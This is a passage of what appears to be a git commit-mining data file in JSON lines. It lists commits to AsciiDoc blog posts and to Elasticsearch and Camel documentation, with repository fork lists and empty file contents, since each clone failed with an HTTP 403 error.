o0\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,yongminxia\/elasticsearch,cwurm\/elasticsearch,iamjakob\/elasticsearch,vietlq\/elasticsearch,spiegela\/elasticsearch,wayeast\/elasticsearch,sc0ttkclark\/elasticsearch,zhiqinghuang\/elasticsearch,fernandozhu\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,zhiqinghuang\/elasticsearch,masterweb121\/elasticsearch,nknize\/elasticsearch,LewayneNaidoo\/elasticsearch,tahaemin\/elasticsearch,NBSW\/elasticsearch,scorpionvicky\/elasticsearch,vietlq\/elasticsearch,palecur\/elasticsearch,mnylen\/elasticsearch,hirdesh2008\/elasticsearch,rmuir\/elasticsearch,YosuaMichael\/elasticsearch,Brijeshrpatel9\/elasticsearch,lydonchandra\/elasticsearch,ThalaivaStars\/OrgRepo1,jimhooker2002\/elasticsearch,humandb\/elasticsearch,apepper\/elasticsearch,Chhunlong\/elasticsearch,JervyShi\/elasticsearch,alexbrasetvik\/elasticsearch,lchennup\/elasticsearch,mjhennig\/elasticsearch,kunallimaye\/elasticsearch,ImpressTV\/elasticsearch,elasticdog\/elasticsearch,Siddartha07\/elasticsearch,queirozfcom\/elasticsearch,markllama\/elasticsearch,areek\/elasticsearch,koxa29\/elasticsearch,MetSystem\/elasticsearch,obourgain\/elasticsearch,HonzaKral\/elasticsearch,lmtwga\/elasticsearch,humandb\/elasticsearch,truemped\/elasticsearch,zkidkid\/elasticsearch,clintongormley\/elasticsearch,Uiho\/elasticsearch,sc0ttkclark\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,rmuir\/elasticsearch,knight1128\/elasticsearch,kunallimaye\/elasticsearch,tahaemin\/elasticsearch,slavau\/elasticsearch,18098924759\/elasticsearch,lzo\/elasticsearch-1,caengcjd\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra-test,onegambler\/elasticsearch,kingaj\/elasticsearch,amit-shar\/elasticsearch,elancom\/elasticsearch,hydro2k\/elasticsearch,kalburgimanjunath\/elasticsearch,mm0\/elasticsearch,TonyChai24\/ESSource,huypx1292\/elasticsearch,lks21c\/elasticsearch,martinstuga\/elasticsearch,Helen-Zhao\/elasticsearch,snikch\/elasticsearch,kimimj\/elasticsearch,polyfractal\/elasticsearch,scottsom\/elasticsearch,geidies\/elasticsearch,Kakakakakku\/elasticsearch,ckclark\/elasticsearch,xingguang2013\/elasticsearch,Shekharrajak\/elasticsearch,vietlq\/elasticsearch,wimvds\/elasticsearch,ThalaivaStars\/OrgRepo1,kimimj\/elasticsearch,mjason3\/elasticsearch,hanswang\/elasticsearch,MisterAndersen\/elasticsearch,bawse\/elasticsearch,awislowski\/elasticsearch,Charlesdong\/elasticsearch,Liziyao\/elasticsearch,loconsolutions\/elasticsearch,kubum\/elasticsearch,Kakakakakku\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,YosuaMichael\/elasticsearch,hafkensite\/elasticsearch,Siddartha07\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,lydonchandra\/elasticsearch,sposam\/elasticsearch,obourgain\/elasticsearch,18098924759\/elasticsearch,AndreKR\/elasticsearch,adrianbk\/elasticsearch,F0lha\/elasticsearch,kenshin233\/elasticsearch,tebriel\/elasticsearch,kubum\/elasticsearch,mgalushka\/elasticsearch,EasonYi\/elasticsearch,linglaiyao1314\/elasticsearch,EasonYi\/elasticsearch,JackyMai\/elasticsearch,Siddartha07\/elasticsearch,loconsolutions\/elasticsearch,strapdata\/elassandra-test,khiraiwa\/elasticsearch,yongminxia\/elasticsearch,pozhidaevak\/elasticsearch,Charlesdong\/elasticsearch,mikemccand\/elasticsearch,skearns64\/elasticsearch,Shekharrajak\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,xingguang2013\/elasticsearch,infusionsoft\/elasticsearch,scottsom\/elasticsearch,MichaelLiZhou\/elasticsearch,strapdata\/elassandra5-rc,sauravmondallive\/elasticsearch,tkssharma\/elasticsearch,JSCooke\/elasticsearch,karthikjaps\/elasticsearch,ulkas\/elasticsearch,JervyShi\/elasticsearch,vingupta3\/elasticsearch,glefloch\/elasticsearch,scottsom\/elasticsearch,AshishThakur\/elasticsearch,18098924759\/elasticsearch,franklanganke\/elasticsearch,mcku\/elasticsearch,umeshdangat\/elasticsearch,phani546\/elasticsearch,onegambler\/elasticsearch,markharwood\/elasticsearch,jimhooker2002\/elasticsearch,AshishThakur\/elasticsearch,njlawton\/elasticsearch,overcome\/elasticsearch,ricardocerq\/elasticsearch,pritishppai\/elasticsearch,markllama\/elasticsearch,NBSW\/elasticsearch,elasticdog\/elasticsearch,lmtwga\/elasticsearch,lightslife\/elasticsearch,robin13\/elasticsearch,beiske\/elasticsearch,linglaiyao1314\/elasticsearch,kevinkluge\/elasticsearch,JervyShi\/elasticsearch,mgalushka\/elasticsearch,xpandan\/elasticsearch,gfyoung\/elasticsearch,knight1128\/elasticsearch,LeoYao\/elasticsearch,easonC\/elasticsearch,djschny\/elasticsearch,zkidkid\/elasticsearch,EasonYi\/elasticsearch,markwalkom\/elasticsearch,petabytedata\/elasticsearch,nrkkalyan\/elasticsearch,pablocastro\/elasticsearch,sarwarbhuiyan\/elasticsearch,nomoa\/elasticsearch,markwalkom\/elasticsearch,karthikjaps\/elasticsearch,palecur\/elasticsearch,naveenhooda2000\/elasticsearch,fooljohnny\/elasticsearch,dylan8902\/elasticsearch,achow\/elasticsearch,polyfractal\/elasticsearch,djschny\/elasticsearch,apepper\/elasticsearch,kingaj\/elasticsearch,hydro2k\/elasticsearch,wayeast\/elasticsearch,obourgain\/elasticsearch,Widen\/elasticsearch,fred84\/elasticsearch,18098924759\/elasticsearch,andrestc\/elasticsearch,likaiwalkman\/elasticsearch,sauravmondallive\/elasticsearch,zhiqinghuang\/elasticsearch,mnylen\/elasticsearch,dpursehouse\/elasticsearch,yuy168\/elasticsearch,beiske\/elasticsearch,djschny\/elasticsearch,tahaemin\/elasticsearch,jimhooker2002\/elasticsearch,HarishAtGitHub\/elasticsearch,cnfire\/elasticsearch-1,liweinan0423\/elasticsearch,mohit\/elasticsearch,Brijeshrpatel9\/elasticsearch,thecocce\/elasticsearch,fforbeck\/elasticsearch,knight1128\/elasticsearch,TonyChai24\/ESSource,MisterAndersen\/elasticsearch,iantruslove\/elasticsearch,andrejserafim\/elasticsearch,gmarz\/elasticsearch,pranavraman\/elasticsearch,bawse\/elasticsearch,huypx1292\/elasticsearch,drewr\/elasticsearch,Shepard1212\/elasticsearch,HarishAtGitHub\/elasticsearch,szroland\/elasticsearch,milodky\/elasticsearch,henakamaMSFT\/elasticsearch,nrkkalyan\/elasticsearch,StefanGor\/elasticsearch,Chhunlong\/elasticsearch,jpountz\/elasticsearch,i-am-Nathan\/elasticsearch,dylan8902\/elasticsearch,kubum\/elasticsearch,markharwood\/elasticsearch,LewayneNaidoo\/elasticsearch,episerver\/elasticsearch,abibell\/elasticsearch,iamjakob\/elasticsearch,maddin2016\/elasticsearch,acchen97\/elasticsearch,ckclark\/elasticsearch,ESamir\/elasticsearch,sreeramjayan\/elasticsearch,camilojd\/elasticsearch,henakamaMSFT\/elasticsearch,KimTaehee\/elasticsearch,xingguang2013\/elasticsearch,mapr\/elasticsearch,ThalaivaStars\/OrgRepo1,beiske\/elasticsearch,i-am-Nathan\/elasticsearch,lightslife\/elasticsearch,wimvds\/elasticsearch,btiernay\/elasticsearch,chirilo\/elasticsearch,andrejserafim\/elasticsearch,MisterAndersen\/elasticsearch,szroland\/elasticsearch,martinstuga\/elasticsearch,mute\/elasticsearch,elancom\/elasticsearch,lzo\/elasticsearch-1,lmtwga\/elasticsearch,kalburgimanjunath\/elasticsearch,jeteve\/elasticsearch,rhoml\/elasticsearch,nellicus\/elasticsearch,rhoml\/elasticsearch,hafkensite\/elasticsearch,dataduke\/elasticsearch,kubum\/elasticsearch,alexbrasetvik\/elasticsearch,mnylen\/elasticsearch,djschny\/elasticsearch,PhaedrusTheGreek\/elasticsearch,scorpionvicky\/elasticsearch,MetSystem\/elasticsearch,karthikjaps\/elasticsearch,gingerwizard\/elasticsearch,Ansh90\/elasticsearch,wittyameta\/elasticsearch,weipinghe\/elasticsearch,beiske\/elasticsearch,nilabhsagar\/elasticsearch,maddin2016\/elasticsearch,tsohil\/elasticsearch,pranavraman\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,awislowski\/elasticsearch,robin13\/elasticsearch,drewr\/elasticsearch,LewayneNaidoo\/elasticsearch,wbowling\/elasticsearch,lydonchandra\/elasticsearch,xingguang2013\/elasticsearch,Ansh90\/elasticsearch,pozhidaevak\/elasticsearch,phani546\/elasticsearch,linglaiyao1314\/elasticsearch,henakamaMSFT\/elasticsearch,JervyShi\/elasticsearch,glefloch\/elasticsearch,diendt\/elasticsearch,Widen\/elasticsearch,wenpos\/elasticsearch,ricardocerq\/elasticsearch,caengcjd\/elasticsearch,MichaelLiZhou\/elasticsearch,rento19962\/elasticsearch,yanjunh\/elasticsearch,ivansun1010\/elasticsearch,vietlq\/elasticsearch,nellicus\/elasticsearch,mbrukman\/elasticsearch,wayeast\/elasticsearch,bestwpw\/elasticsearch,gingerwizard\/elasticsearch,jimhooker2002\/elasticsearch,djschny\/elasticsearch,bawse\/elasticsearch,vietlq\/elasticsearch,wangtuo\/elasticsearch,apepper\/elasticsearch,palecur\/elasticsearch,iamjakob\/elasticsearch,tahaemin\/elasticsearch,skearns64\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,wittyameta\/elasticsearch,khiraiwa\/elasticsearch,IanvsPoplicola\/elasticsearch,mute\/elasticsearch,thecocce\/elasticsearch,C-Bish\/elasticsearch,Widen\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,AshishThakur\/elasticsearch,tebriel\/elasticsearch,nellicus\/elasticsearch,snikch\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/filter-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/filter-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9443262bb15c11555284a177069384045ebc5c6","subject":"y2b create post Asus NX90 Unboxing \\u0026 Overview - In HD! (Bang \\u0026 Olufsen Notebook)","message":"y2b create post Asus NX90 Unboxing \\u0026 Overview - In HD! (Bang \\u0026 Olufsen Notebook)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-25-Asus-NX90-Unboxing-u0026-Overview--In-HD-Bang-u0026-Olufsen-Notebook.adoc","new_file":"_posts\/2011-01-25-Asus-NX90-Unboxing-u0026-Overview--In-HD-Bang-u0026-Olufsen-Notebook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbe3757709169debe3f3ca7e1f5fe45e3a1346a8","subject":"y2b create post The Portable Rapid Drink Chiller!","message":"y2b create post The Portable Rapid Drink Chiller!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-08-The-Portable-Rapid-Drink-Chiller.adoc","new_file":"_posts\/2016-09-08-The-Portable-Rapid-Drink-Chiller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89fa6869af8a84117e6fce9029070d8edec2753a","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7706ee91dfabf4cbeecee34c04aa9fd16ea34bb5","subject":"y2b create post Beats By Dr Dre Beats MIXR Unboxing","message":"y2b create post Beats By Dr Dre Beats MIXR Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-06-Beats-By-Dr-Dre-Beats-MIXR-Unboxing.adoc","new_file":"_posts\/2012-05-06-Beats-By-Dr-Dre-Beats-MIXR-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb8c1d0eec07ae53f8c4548627e5a47d098077cb","subject":"Update 2015-05-16-First-post-after-hubpressio-install.adoc","message":"Update 2015-05-16-First-post-after-hubpressio-install.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2015-05-16-First-post-after-hubpressio-install.adoc","new_file":"_posts\/2015-05-16-First-post-after-hubpressio-install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e26a8f45ee87af14c75de5217063a658fa7feac","subject":"Update 2017-02-22-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","message":"Update 2017-02-22-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-22-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_file":"_posts\/2017-02-22-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac1a9f9953e2324a67454e1f5646e02969ad0fa","subject":"Deleted 2015-09-2-Daisies-arent-roses.adoc","message":"Deleted 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"429bac49e0e6e94544a91b09fcf8a72094b19011","subject":"y2b create post S6 Active - Best Phone Right Now?","message":"y2b create post S6 Active - Best Phone Right Now?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-09-S6-Active--Best-Phone-Right-Now.adoc","new_file":"_posts\/2015-07-09-S6-Active--Best-Phone-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1a1b55c251a8495b6e01d9270d67425564e3c3b","subject":"Update 2015-06-21-suzakinishi.adoc","message":"Update 2015-06-21-suzakinishi.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-21-suzakinishi.adoc","new_file":"_posts\/2015-06-21-suzakinishi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92513f21da119e039a50b6d679543e6cdfd76d77","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a25e05d61876e5a41797e21847d9733c7d18bb0d","subject":"Added Python language to Gitbook","message":"Added Python language to Gitbook\n","repos":"DariusX\/camel,tadayosi\/camel,JYBESSON\/camel,neoramon\/camel,ssharma\/camel,NickCis\/camel,zregvart\/camel,yuruki\/camel,pax95\/camel,objectiser\/camel,bgaudaen\/camel,cunningt\/camel,Thopap\/camel,tdiesler\/camel,yuruki\/camel,tadayosi\/camel,drsquidop\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,prashant2402\/camel,adessaigne\/camel,jonmcewen\/camel,allancth\/camel,bhaveshdt\/camel,ssharma\/camel,anton-k11\/camel,jarst\/camel,isavin\/camel,zregvart\/camel,tlehoux\/camel,sabre1041\/camel,scranton\/camel,driseley\/camel,kevinearls\/camel,apache\/camel,tkopczynski\/camel,chirino\/camel,JYBESSON\/camel,dmvolod\/camel,jamesnetherton\/camel,akhettar\/camel,nicolaferraro\/camel,pkletsko\/camel,curso007\/camel,adessaigne\/camel,tkopczynski\/camel,yuruki\/camel,acartapanis\/camel,onders86\/camel,Fabryprog\/camel,sabre1041\/camel,kevinearls\/camel,tadayosi\/camel,pax95\/camel,DariusX\/camel,bgaudaen\/camel,pax95\/camel,sverkera\/camel,salikjan\/camel,kevinearls\/camel,bgaudaen\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,apache\/camel,gilfernandes\/camel,tkopczynski\/camel,neoramon\/camel,CodeSmell\/camel,acartapanis\/camel,curso007\/camel,tkopczynski\/camel,jarst\/camel,cunningt\/camel,JYBESSON\/camel,pkletsko\/camel,isavin\/camel,pkletsko\/camel,pmoerenhout\/camel,w4tson\/camel,veithen\/camel,yuruki\/camel,alvinkwekel\/camel,hqstevenson\/camel,allancth\/camel,dmvolod\/camel,pmoerenhout\/camel,anton-k11\/camel,christophd\/camel,rmarting\/camel,nikhilvibhav\/camel,sirlatrom\/camel,NickCis\/camel,snurmine\/camel,tadayosi\/camel,pmoerenhout\/camel,davidkarlsen\/camel,rmarting\/camel,snurmine\/camel,dmvolod\/camel,isavin\/camel,bhaveshdt\/camel,mcollovati\/camel,scranton\/camel,nboukhed\/camel,gautric\/camel,gnodet\/camel,scranton\/camel,onders86\/camel,alvinkwekel\/camel,neoramon\/camel,RohanHart\/camel,curso007\/camel,allancth\/camel,rmarting\/camel,NickCis\/camel,w4tson\/camel,sirlatrom\/camel,ssharma\/camel,mcollovati\/camel,drsquidop\/camel,cunningt\/camel,hqstevenson\/camel,jkorab\/camel,bgaudaen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,ssharma\/camel,jamesnetherton\/camel,pmoerenhout\/camel,gnodet\/camel,sverkera\/camel,Fabryprog\/camel,ssharma\/camel,neoramon\/camel,christophd\/camel,tdiesler\/camel,hqstevenson\/camel,anoordover\/camel,snurmine\/camel,veithen\/camel,jarst\/camel,acartapanis\/camel,CodeSmell\/camel,akhettar\/camel,cunningt\/camel,nikhilvibhav\/camel,mgyongyosi\/camel,sirlatrom\/camel,nboukhed\/camel,scranton\/camel,gautric\/camel,onders86\/camel,rmarting\/camel,yuruki\/camel,veithen\/camel,jkorab\/camel,cunningt\/camel,akhettar\/camel,sabre1041\/camel,anton-k11\/camel,sverkera\/camel,jonmcewen\/camel,objectiser\/camel,gautric\/camel,ullgren\/camel,scranton\/camel,NickCis\/camel,Thopap\/camel,lburgazzoli\/apache-camel,isavin\/camel,nboukhed\/camel,nboukhed\/camel,sabre1041\/camel,JYBESSON\/camel,chirino\/camel,mgyongyosi\/camel,jonmcewen\/camel,sirlatrom\/camel,sverkera\/camel,pkletsko\/camel,isavin\/camel,w4tson\/camel,Thopap\/camel,driseley\/camel,salikjan\/camel,mgyongyosi\/camel,gilfernandes\/camel,kevinearls\/camel,gautric\/camel,neoramon\/camel,lburgazzoli\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,mgyongyosi\/camel,chirino\/camel,ssharma\/camel,onders86\/camel,curso007\/camel,sabre1041\/camel,jonmcewen\/camel,nboukhed\/camel,christophd\/camel,chirino\/camel,jamesnetherton\/camel,anoordover\/camel,jonmcewen\/camel,gilfernandes\/camel,ullgren\/camel,nikhilvibhav\/camel,lburgazzoli\/apache-camel,dmvolod\/camel,onders86\/camel,JYBESSON\/camel,NickCis\/camel,rmarting\/camel,objectiser\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,christophd\/camel,pmoerenhout\/camel,drsquidop\/camel,prashant2402\/camel,anoordover\/camel,curso007\/camel,bhaveshdt\/camel,scranton\/camel,jkorab\/camel,kevinearls\/camel,sverkera\/camel,anoordover\/camel,nikhilvibhav\/camel,acartapanis\/camel,onders86\/camel,anton-k11\/camel,snurmine\/camel,mgyongyosi\/camel,ullgren\/camel,tdiesler\/camel,gnodet\/camel,CodeSmell\/camel,pmoerenhout\/camel,RohanHart\/camel,adessaigne\/camel,acartapanis\/camel,RohanHart\/camel,sverkera\/camel,allancth\/camel,driseley\/camel,sirlatrom\/camel,Fabryprog\/camel,gautric\/camel,veithen\/camel,tlehoux\/camel,dmvolod\/camel,mcollovati\/camel,anton-k11\/camel,gautric\/camel,drsquidop\/camel,jkorab\/camel,akhettar\/camel,drsquidop\/camel,neoramon\/camel,christophd\/camel,Thopap\/camel,allancth\/camel,veithen\/camel,w4tson\/camel,driseley\/camel,jamesnetherton\/camel,pkletsko\/camel,mcollovati\/camel,dmvolod\/camel,akhettar\/camel,bgaudaen\/camel,w4tson\/camel,Thopap\/camel,gilfernandes\/camel,snurmine\/camel,jarst\/camel,davidkarlsen\/camel,nicolaferraro\/camel,lburgazzoli\/camel,tadayosi\/camel,lburgazzoli\/camel,tdiesler\/camel,tkopczynski\/camel,pkletsko\/camel,yuruki\/camel,curso007\/camel,zregvart\/camel,hqstevenson\/camel,bhaveshdt\/camel,veithen\/camel,acartapanis\/camel,anoordover\/camel,Thopap\/camel,apache\/camel,apache\/camel,jarst\/camel,akhettar\/camel,prashant2402\/camel,gilfernandes\/camel,DariusX\/camel,objectiser\/camel,adessaigne\/camel,rmarting\/camel,snurmine\/camel,tlehoux\/camel,JYBESSON\/camel,gilfernandes\/camel,bhaveshdt\/camel,jamesnetherton\/camel,hqstevenson\/camel,driseley\/camel,mgyongyosi\/camel,sabre1041\/camel,anton-k11\/camel,Fabryprog\/camel,gnodet\/camel,drsquidop\/camel,pax95\/camel,ullgren\/camel,jonmcewen\/camel,nicolaferraro\/camel,lburgazzoli\/camel,bhaveshdt\/camel,anoordover\/camel,jkorab\/camel,CodeSmell\/camel,nboukhed\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,tdiesler\/camel,bgaudaen\/camel,allancth\/camel,RohanHart\/camel,tlehoux\/camel,lburgazzoli\/camel,chirino\/camel,jkorab\/camel,prashant2402\/camel,cunningt\/camel,w4tson\/camel,zregvart\/camel,davidkarlsen\/camel,driseley\/camel,apache\/camel,davidkarlsen\/camel,tlehoux\/camel,nicolaferraro\/camel,adessaigne\/camel,DariusX\/camel,tlehoux\/camel,chirino\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,kevinearls\/camel,pax95\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,jarst\/camel,NickCis\/camel,hqstevenson\/camel,gnodet\/camel,lburgazzoli\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,jamesnetherton\/camel,isavin\/camel,prashant2402\/camel","old_file":"components\/camel-script\/src\/main\/docs\/python-language.adoc","new_file":"components\/camel-script\/src\/main\/docs\/python-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c6901215ace238f2e179991399ba0fdf789a6d6","subject":"Delete 2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","message":"Delete 2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_file":"_posts\/2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1759691bfce6c42c31827aaa14ace60fd40389ac","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2c1551e046d31359b06f31b4bb9f5f6ce5d838b","subject":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","message":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e294608c7cc87c26179e3dfcca9ccc208700ea07","subject":"Update 2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfefe88ffbb1320b9b702553148129a0bc4b53cc","subject":"0.10.0.Alpha2 release announcement","message":"0.10.0.Alpha2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-03-debezium-0-10-0-alpha2-released.adoc","new_file":"blog\/2019-06-03-debezium-0-10-0-alpha2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65e796d6e96cebcb3a3cdcd17dd6456e1da74cc9","subject":"Update 2015-08-08-Demo-Tittle.adoc","message":"Update 2015-08-08-Demo-Tittle.adoc","repos":"lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io","old_file":"_posts\/2015-08-08-Demo-Tittle.adoc","new_file":"_posts\/2015-08-08-Demo-Tittle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasferraro\/lucasferraro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62c270e4f23094b8a4730b830624c3c59abf9396","subject":"Publish 2016-08-27.adoc","message":"Publish 2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"2016-08-27.adoc","new_file":"2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d1d600a7321af785e0d753612cd4ff37aad6ffa","subject":"Update 2017-09-01-Welcome-friends.adoc","message":"Update 